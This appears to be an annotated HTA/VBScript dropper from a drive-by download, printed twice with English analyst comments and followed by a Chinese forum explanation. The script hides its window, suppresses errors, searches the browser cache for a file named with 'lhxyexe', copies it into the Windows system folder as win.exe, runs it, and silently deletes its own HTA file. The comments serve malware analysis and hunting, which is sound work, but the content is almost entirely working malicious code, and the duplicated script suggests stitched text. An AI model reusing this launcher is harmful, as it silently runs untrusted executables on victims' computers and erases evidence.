<HTA:APPLICATION caption="no" border="none" showintaskbar="no" >
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBScript">
' Script-level setup for the HTA payload stage.
' Errors are suppressed from here on, so a failing step (missing registry value,
' failed copy, failed launch) produces no dialog and the script simply continues.
on error resume next
' Move the window to the screen origin and shrink it to 0x0. Combined with the
' caption="no" / border="none" / showintaskbar="no" attributes on the
' HTA:APPLICATION tag, the user gets no visible window while the script runs.
window.moveTo 0,0
window.resizeTo 0,0
' Script-level variable: assigned the drop destination later in the script and
' read inside Search as the copy target.
dim exepath
' Search(objFolder): recursive walk over objFolder and all of its subfolders.
' In each folder, the first file whose name contains "lhxyexe" (case-insensitive,
' vbTextCompare) is copied to the path held in the script-level variable exepath.
' Declared as a Function but never assigns a return value; it is used only for
' its side effect (the file copy).
' Relies on script-level state: objg_fso (FileSystemObject) and exepath.
' objFile and filecp are not Dim'd, so they are implicit script-level variables.
Function Search(objFolder)
Dim objSubFolder
For Each objFile in objFolder.Files
' Substring match on the file name only; the marker string "lhxyexe" is the
' identifying artefact of the staged payload and is useful as a hunting term.
If InStr(1, objfile.name, "lhxyexe", vbtextcompare) then
set filecp = objg_fso.getfile(objfile.path)
' File.Copy is called without the overwrite argument (default True), so an
' existing file at exepath is replaced.
filecp.copy (exepath)
' Leaves only the file loop of the current folder; the subfolder loop below
' still runs, so a later match in a subfolder copies over the same destination.
exit for
End If
Next
For Each objSubFolder in objFolder.SubFolders
Search objSubFolder
Next
End Function
' Main sequence: locate a staged file in the browser cache, copy it out, run it,
' then remove the HTA and close. Observable artefacts for defenders: a registry
' read of the Shell Folders "cache" value, a file copy out of the cache tree, a
' process launch by the HTA host, and a hidden "command.com /c del" child process.
Set objg_fso = CreateObject("Scripting.FileSystemObject")
' wsh is the object declared by the <object id='wsh' ...> tag on the page; it is
' used here for RegRead and Run. The "cache" value under Shell Folders is
' described in the page's own commentary as the IE temporary-files directory.
str=WSH.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache")
set tempfolder = objg_fso.getfolder(str)
' GetSpecialFolder(1) is the Windows system folder (SystemFolder constant).
set othisfolder = objg_fso.GetSpecialFolder(1)
' NOTE(review): the path and "win.exe" are concatenated with no separator. If
' Folder.Path carries no trailing backslash (the usual case), the resulting file
' name is the system folder name with "win.exe" appended, located in the parent
' directory - hunt for that name as well as <system folder>\win.exe.
exepath=othisfolder.path & "win.exe"
' Recursive search of the cache folder; copies the matching file to exepath.
search tempfolder
' Launches whatever is at exepath. Because errors are suppressed, this line runs
' even if no file was found or the copy failed.
wsh.run (exepath)
' Window style 0 = hidden. Deletes c:\win.hta - presumably this HTA's own
' on-disk location (not shown in this file; confirm against the delivery stage).
wsh.run "command.com /c del c:\win.hta" ,0
window.close()
</script>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBScript">
' Script-level setup. All runtime errors are silenced from this point, so no
' error dialog is shown if any later step fails.
on error resume next
' Position the window at 0,0 and resize it to 0x0 so that nothing is visible
' on screen while the script executes.
window.moveTo 0,0
window.resizeTo 0,0
' Script-level variable holding the copy destination; set later in the script
' and read by Search.
dim exepath
' Search(objFolder): depth-first traversal of objFolder. For every folder
' visited, the first file whose name contains "lhxyexe" (compared
' case-insensitively via vbTextCompare) is copied to the script-level exepath.
' No return value is assigned; the function exists for the copy side effect.
' Depends on the script-level objg_fso and exepath; objFile and filecp are
' undeclared and therefore implicit script-level variables.
Function Search(objFolder)
Dim objSubFolder
For Each objFile in objFolder.Files
' Name-only substring test; "lhxyexe" is the marker for the staged file.
If InStr(1, objfile.name, "lhxyexe", vbtextcompare) then
set filecp = objg_fso.getfile(objfile.path)
' Copy with the default overwrite behaviour (True): an existing destination
' file is replaced.
filecp.copy (exepath)
' Stops scanning files in this folder only; recursion into subfolders below
' still happens.
exit for
End If
Next
For Each objSubFolder in objFolder.SubFolders
Search objSubFolder
Next
End Function
' Main sequence: read the cache folder location from the registry, search it for
' the staged file, copy it out, execute it, delete the HTA and close the window.
Set objg_fso = CreateObject("Scripting.FileSystemObject")
' wsh refers to the object created by the page's <object id='wsh' ...> tag and
' is used for RegRead and Run. The page's commentary identifies the "cache"
' value as the directory where Windows keeps IE temporary files.
str=WSH.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache")
set tempfolder = objg_fso.getfolder(str)
' Special folder 1 is the Windows system folder.
set othisfolder = objg_fso.GetSpecialFolder(1)
' NOTE(review): no path separator is inserted before "win.exe"; when the folder
' path has no trailing backslash, the file lands next to the system folder under
' a name formed from the folder name plus "win.exe". Check both locations when
' triaging a host.
exepath=othisfolder.path & "win.exe"
' Walk the cache folder tree and copy the matching file to exepath.
search tempfolder
' Execute the copied file; runs regardless of whether the copy succeeded,
' since errors are suppressed.
wsh.run (exepath)
' Hidden window (style 0). Removes c:\win.hta - presumably the location this
' HTA was written to by an earlier stage; confirm from the delivery page.
wsh.run "command.com /c del c:\win.hta" ,0
window.close()
</script>
str=WSH.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache")
set tempfolder = objg_fso.getfolder(str)
是获得Windows保存IE临时文件的目录。
set othisfolder = objg_fso.GetSpecialFolder(1)
是获得系统目录。
exepath=othisfolder.path & "win.exe"
是获得系统目录下面的win.exe。
wsh.run (exepath)
是执行exepath文件。
从上面的整个程序来看，就是将IE临时文件中的一个名称带lhxyexe的文件覆盖win.exe并执行。
[email protected]多谢了